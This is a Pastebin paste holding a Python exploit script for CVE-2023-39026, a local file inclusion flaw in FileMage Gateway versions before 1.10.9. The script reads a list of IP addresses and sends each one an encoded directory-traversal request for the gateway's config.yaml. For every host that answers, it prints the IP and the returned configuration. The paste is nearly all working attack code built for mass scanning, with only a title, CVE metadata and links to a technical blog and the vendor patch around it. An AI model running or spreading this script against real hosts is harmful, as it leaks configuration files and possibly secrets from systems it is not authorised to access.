Advertisement
FlyFar

FileMage Gateway 1.10.9 - Local File Inclusion - CVE-2023-39026

Jan 20th, 2024
864
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.50 KB | Cybersecurity | 0 0
  1. # Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
  2. # Date: 8/22/2023
  3. # Exploit Author: Bryce "Raindayzz" Harty  
  4. # Vendor Homepage: https://www.filemage.io/
  5. # Version: Azure Versions < 1.10.9
  6. # Tested on: All Azure deployments < 1.10.9
  7. # CVE : CVE-2023-39026
  8.  
  9. # Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
  10. # Patch from vendor - https://www.filemage.io/docs/updates.html
  11.  
  12. import requests
  13. import warnings
  14. warnings.filterwarnings("ignore")
  15. def worker(url):
  16.     response = requests.get(url, verify=False, timeout=.5)
  17.     return response
  18. def main():
  19.     listIP = []
  20.     file_path = input("Enter the path to the file containing the IP addresses: ")
  21.     with open(file_path, 'r') as file:
  22.         ip_list = file.read().splitlines()
  23.         searchString = "tls"
  24.         for ip in ip_list:
  25.             url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
  26.             try:
  27.                 response = worker(url)
  28.                 #print(response.text)
  29.                 if searchString in response.text:
  30.                     print("Vulnerable IP: " + ip)
  31.                     print(response.text)
  32.                     listIP.append(ip)
  33.             except requests.exceptions.RequestException as e:  
  34.                 print(f"Error occurred for {ip}: {str(e)}")
  35.  
  36.     for x in listIP:
  37.         print(x)
  38. if __name__ == '__main__':
  39.     main()
  40.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement